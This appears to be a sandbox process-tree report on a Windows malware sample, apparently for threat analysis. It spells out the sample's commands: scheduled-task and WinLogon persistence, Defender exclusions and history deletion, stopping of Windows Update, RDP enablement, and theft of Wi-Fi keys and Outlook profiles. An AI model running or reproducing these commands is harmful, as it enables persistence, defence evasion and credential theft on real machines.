c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:380

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:416

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1100

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1152

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1052
- c:\windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2940
- C:\Users\Admin\AppData\Roaming\Norfolk\Fireplace.exe.com
  C:\Users\Admin\AppData\Roaming\Norfolk\Fireplace.exe.com C:\Users\Admin\AppData\Roaming\Norfolk\S
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:404
- C:\Users\Admin\AppData\Roaming\Norfolk\Fireplace.exe.com
  C:\Users\Admin\AppData\Roaming\Norfolk\Fireplace.exe.com C:\Users\Admin\AppData\Roaming\Norfolk\S
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4984
- C:\Users\Admin\AppData\Roaming\Norfolk\Fireplace.exe.com
  C:\Users\Admin\AppData\Roaming\Norfolk\Fireplace.exe.com C:\Users\Admin\AppData\Roaming\Norfolk\S
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4188
- C:\Users\Admin\AppData\Roaming\Norfolk\Fireplace.exe.com
  C:\Users\Admin\AppData\Roaming\Norfolk\Fireplace.exe.com C:\Users\Admin\AppData\Roaming\Norfolk\S
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4320
- C:\Users\Admin\AppData\Roaming\Norfolk\Fireplace.exe.com
  C:\Users\Admin\AppData\Roaming\Norfolk\Fireplace.exe.com C:\Users\Admin\AppData\Roaming\Norfolk\S
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4636

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1168

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1184

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1312

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:764

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1412
- c:\windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2824

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1428

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1444

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1488

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1568

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1624

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1608

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1744

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1752

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1864

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1880

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2236

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:2016

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1968

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2244

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2264

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2424

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2416

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2324

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2448

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2488

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:3148
- C:\Users\Admin\AppData\Local\Temp\77777.exe
  "C:\Users\Admin\AppData\Local\Temp\77777.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4192
- - C:\Users\Admin\AppData\Local\Temp\SETUP_39939\Engine.exe
    C:\Users\Admin\AppData\Local\Temp\SETUP_39939\Engine.exe /TH_ID=_4188 /OriginExe="C:\Users\Admin\AppData\Local\Temp\77777.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4728
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cmd < Yugoslavia
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4940
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3824
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell get-process avastui
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3524
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell get-process avgui
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3108
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^TiesHighsFridayPromisedOrganismsPromotedStronglyBannersTermExplainOrganisedPhpLastingMaritime$" Finding
        6⤵
        
        PID:5088
      - C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\28073\Bondage.exe.pif
        
        28073\\Bondage.exe.pif 28073\\M
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:1000
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "dZVxEGlqbg" /tr "C:\Users\Admin\AppData\Roaming\claRXiEwVe\dZVxEGlqbg.exe.com C:\Users\Admin\AppData\Roaming\claRXiEwVe\H" /sc onlogon /F /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:4032
        
        C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\28073\Bondage.exe.pif
        
        C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\28073\Bondage.exe.pif
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:5060
        
        C:\ProgramData\84222742281740935377.exe
        
        "C:\ProgramData\84222742281740935377.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2228
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 607 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Windows\system32\svchost.exe.exe,"
        9⤵
        
        PID:4404
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:4724
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 607
        10⤵
        Runs ping.exe
        
        PID:4488
        
        C:\Windows\system32\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Windows\system32\svchost.exe.exe,"
        10⤵
        Modifies WinLogon for persistence
        
        PID:2700
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 612 > nul && copy "C:\ProgramData\84222742281740935377.exe" "C:\Windows\system32\svchost.exe.exe" && ping 127.0.0.1 -n 612 > nul && "C:\Windows\system32\svchost.exe.exe"
        9⤵
        
        PID:3484
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:3528
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 612
        10⤵
        Runs ping.exe
        
        PID:4340
        
        C:\ProgramData\80455598848292478873.exe
        
        "C:\ProgramData\80455598848292478873.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:8
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe; Set-MpPreference -SubmitSamplesConsent NeverSend -PUAProtection Disabled
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\a0d660e2-0356-487a-a353-a067ea0c9458.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a0d660e2-0356-487a-a353-a067ea0c9458.exe"
        9⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetWindowsHookEx
        
        PID:2376
        
        C:\Windows\SysWOW64\nslookup.exe
        
        nslookup dfslkdjfklhjsrhfgauiehruifghai
        10⤵
        
        PID:4420
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c cmd < 5
        10⤵
        
        PID:3508
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        11⤵
        
        PID:2704
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell get-process avastui
        12⤵
        
        PID:4000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell get-process avgui
        12⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1456
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^syXbtyYOvRrtwlrwBarUhdXsBSlrxLhdlLzfzDGmXzfNBcLMWdWSExswiFWkUVxLDNTfQOHXMDWTqlQyibutOcMQzsiOHxFeZEpNCvVoIYu$" 8
        12⤵
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\28536\Prague.exe.pif
        
        28536\\Prague.exe.pif 28536\\m
        12⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4356
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "Fireplace" /tr "C:\Users\Admin\AppData\Roaming\Norfolk\Fireplace.exe.com C:\Users\Admin\AppData\Roaming\Norfolk\S" /sc onlogon /F /RL HIGHEST
        13⤵
        Creates scheduled task(s)
        
        PID:4824
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "Jacksonville" /tr "C:\Users\Admin\AppData\Roaming\Norfolk\Fireplace.exe.com C:\Users\Admin\AppData\Roaming\Norfolk\S" /sc minute /mo 3 /F /RL HIGHEST
        13⤵
        Creates scheduled task(s)
        
        PID:4972
        
        C:\Windows\SysWOW64\attrib.exe
        
        C:\Windows\SysWOW64\attrib.exe
        13⤵
        Sets DLL path for service in the registry
        Drops file in Program Files directory
        Checks processor information in registry
        Views/modifies file attributes
        
        PID:1924
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "powershell -Command Remove-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe;Add-MpPreference -ExclusionPath $env:ProgramFiles,$env:Appdata;Add-MpPreference -ExclusionProcess *.com,*.pif;Add-MpPreference -ExclusionExtension com,pif; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled"
        14⤵
        
        PID:932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Remove-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe;Add-MpPreference -ExclusionPath $env:ProgramFiles,$env:Appdata;Add-MpPreference -ExclusionProcess *.com,*.pif;Add-MpPreference -ExclusionExtension com,pif; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled
        15⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:936
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "del /S /Q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\" > nul"
        14⤵
        
        PID:1028
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "ver | find /v "" > C:\Windows\Temp\f23f"
        14⤵
        
        PID:2832
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ver "
        15⤵
        
        PID:1872
        
        C:\Windows\system32\find.exe
        
        find /v ""
        15⤵
        
        PID:404
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "net start TermService /y"
        14⤵
        
        PID:1984
        
        C:\Windows\system32\net.exe
        
        net start TermService /y
        15⤵
        
        PID:2616
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService /y
        16⤵
        
        PID:3592
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName | find /v "" > C:\Windows\Temp\f23f"
        14⤵
        
        PID:2676
        
        C:\Windows\system32\find.exe
        
        find /v ""
        15⤵
        
        PID:3800
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
        15⤵
        
        PID:3228
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "reg query "HKEY_CURRENT_USER\Keyboard Layout\Preload" | find /v "" > C:\Windows\Temp\f23f"
        14⤵
        
        PID:3368
        
        C:\Windows\system32\reg.exe
        
        reg query "HKEY_CURRENT_USER\Keyboard Layout\Preload"
        15⤵
        
        PID:4344
        
        C:\Windows\system32\find.exe
        
        find /v ""
        15⤵
        
        PID:5108
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "wmic path win32_VideoController get name | find /v "" > C:\Windows\Temp\f23f"
        14⤵
        
        PID:3256
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        15⤵
        
        PID:4548
        
        C:\Windows\system32\find.exe
        
        find /v ""
        15⤵
        
        PID:3892
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "chcp 65001 && systeminfo /fo list | find /v "" > C:\Windows\Temp\f23f"
        14⤵
        
        PID:4180
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo /fo list
        15⤵
        Gathers system information
        
        PID:4940
        
        C:\Windows\system32\find.exe
        
        find /v ""
        15⤵
        
        PID:4404
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "powershell "Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion | Format-Table -AutoSize" | find /v "" > C:\Windows\Temp\f23f"
        14⤵
        
        PID:4316
        
        C:\Windows\system32\find.exe
        
        find /v ""
        15⤵
        
        PID:1800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion | Format-Table -AutoSize"
        15⤵
        
        PID:4284
        
        C:\Windows\SysWOW64\attrib.exe
        
        C:\Windows\SysWOW64\attrib.exe
        13⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:2072
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "powershell -Command Remove-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe;Add-MpPreference -ExclusionPath $env:ProgramFiles,$env:Appdata;Add-MpPreference -ExclusionProcess *.com,*.pif;Add-MpPreference -ExclusionExtension com,pif; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled"
        14⤵
        
        PID:3240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Remove-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe;Add-MpPreference -ExclusionPath $env:ProgramFiles,$env:Appdata;Add-MpPreference -ExclusionProcess *.com,*.pif;Add-MpPreference -ExclusionExtension com,pif; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled
        15⤵
        
        PID:3788
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "del /S /Q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\" > nul"
        14⤵
        
        PID:1784
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "ver | find /v "" > C:\Windows\Temp\f23f"
        14⤵
        
        PID:2832
        
        C:\Windows\system32\find.exe
        
        find /v ""
        15⤵
        
        PID:2776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ver "
        15⤵
        
        PID:2772
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "certutil -hashfile "C:\Program Files\RDP Wraper\rdpwrap.dll" MD5 | find /i /v "md5" | find /i /v "certutil" | find /v "" > C:\Windows\Temp\f23f"
        14⤵
        
        PID:884
        
        C:\Windows\system32\certutil.exe
        
        certutil -hashfile "C:\Program Files\RDP Wraper\rdpwrap.dll" MD5
        15⤵
        
        PID:4748
        
        C:\Windows\system32\find.exe
        
        find /i /v "md5"
        15⤵
        
        PID:5008
        
        C:\Windows\system32\find.exe
        
        find /v ""
        15⤵
        
        PID:2172
        
        C:\Windows\system32\find.exe
        
        find /i /v "certutil"
        15⤵
        
        PID:3200
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "net start TermService /y"
        14⤵
        
        PID:4116
        
        C:\Windows\system32\net.exe
        
        net start TermService /y
        15⤵
        
        PID:4220
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService /y
        16⤵
        
        PID:4676
        
        C:\Windows\SysWOW64\attrib.exe
        
        C:\Windows\SysWOW64\attrib.exe
        13⤵
        Views/modifies file attributes
        
        PID:3108
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:4280
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "powershell -Command Remove-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe;Add-MpPreference -ExclusionPath $env:ProgramFiles,$env:Appdata;Add-MpPreference -ExclusionProcess *.com,*.pif;Add-MpPreference -ExclusionExtension com,pif; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled"
        14⤵
        
        PID:2280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Remove-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe;Add-MpPreference -ExclusionPath $env:ProgramFiles,$env:Appdata;Add-MpPreference -ExclusionProcess *.com,*.pif;Add-MpPreference -ExclusionExtension com,pif; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled
        15⤵
        
        PID:3044
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "del /S /Q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\" > nul"
        14⤵
        
        PID:820
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "ver | find /v "" > C:\Windows\Temp\f23f"
        14⤵
        
        PID:3528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ver "
        15⤵
        
        PID:4300
        
        C:\Windows\system32\find.exe
        
        find /v ""
        15⤵
        
        PID:1200
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost -n 18
        12⤵
        Runs ping.exe
        
        PID:2284
        
        C:\Users\Admin\AppData\Local\Temp\npp.8.4.7.Installer.x64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\npp.8.4.7.Installer.x64.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:732
        
        C:\ProgramData\98868983669815794021.exe
        
        "C:\ProgramData\98868983669815794021.exe"
        8⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:4744
        
        C:\Users\Admin\AppData\Roaming\asdfasdlkfjsdkfasdfnkjlsadnfsadf\zeron.exe
        
        "C:\Users\Admin\AppData\Roaming\asdfasdlkfjsdkfasdfnkjlsadnfsadf\zeron.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2680
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:2096
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 1596
        10⤵
        Program crash
        
        PID:452
        
        C:\Users\Admin\AppData\Roaming\asdfasdlkfjsdkfasdfnkjlsadnfsadf\zeron.exe
        
        "C:\Users\Admin\AppData\Roaming\asdfasdlkfjsdkfasdfnkjlsadnfsadf\zeron.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2980
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:3676
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 1552
        10⤵
        Program crash
        
        PID:4204
        
        C:\Users\Admin\AppData\Roaming\asdfasdlkfjsdkfasdfnkjlsadnfsadf\zeron.exe
        
        "C:\Users\Admin\AppData\Roaming\asdfasdlkfjsdkfasdfnkjlsadnfsadf\zeron.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:620
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3372
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 620 -s 1556
        10⤵
        Program crash
        
        PID:4164
        
        C:\Users\Admin\AppData\Roaming\asdfasdlkfjsdkfasdfnkjlsadnfsadf\zeron.exe
        
        "C:\Users\Admin\AppData\Roaming\asdfasdlkfjsdkfasdfnkjlsadnfsadf\zeron.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4720
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5028
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 1560
        10⤵
        Program crash
        
        PID:4140
        
        C:\ProgramData\95602302436173465811.exe
        
        "C:\ProgramData\95602302436173465811.exe"
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        
        PID:4532
        
        C:\ProgramData\09043308113708478059.exe
        
        "C:\ProgramData\09043308113708478059.exe"
        8⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        Checks processor information in registry
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        outlook_office_path
        outlook_win_path
        
        PID:1384
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:4968
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:3196
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        10⤵
        
        PID:1196
        
        C:\Windows\system32\findstr.exe
        
        findstr All
        10⤵
        
        PID:848
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile name="65001" key=clear | findstr Key
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:224
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:2700
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile name="65001" key=clear
        10⤵
        
        PID:3652
        
        C:\Windows\system32\findstr.exe
        
        findstr Key
        10⤵
        
        PID:4572
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\28073\Bondage.exe.pif" & exit
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3284
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        9⤵
        Delays execution with timeout.exe
        
        PID:4328
      - C:\Windows\SysWOW64\PING.EXE
        
        ping localhost -n 18
        6⤵
        Runs ping.exe
        
        PID:5040
- C:\Windows\System32\GamePanel.exe
  "C:\Windows\System32\GamePanel.exe" 00000000000901EC /startuptips
  2⤵
  - Checks SCSI registry key(s)
  PID:3508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:5096
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:4428
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2520
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:820
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4300
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3372
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1060
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:4316
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hpliwgasn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Google Crash Handler' /tr '''C:\Program Files\Google\Chrome\GoogleCrashHandler.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\GoogleCrashHandler.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Google Crash Handler' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:1336
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:336

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3660

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4040
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4040 -s 912
  2⤵
  - Program crash
  PID:5104

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2028

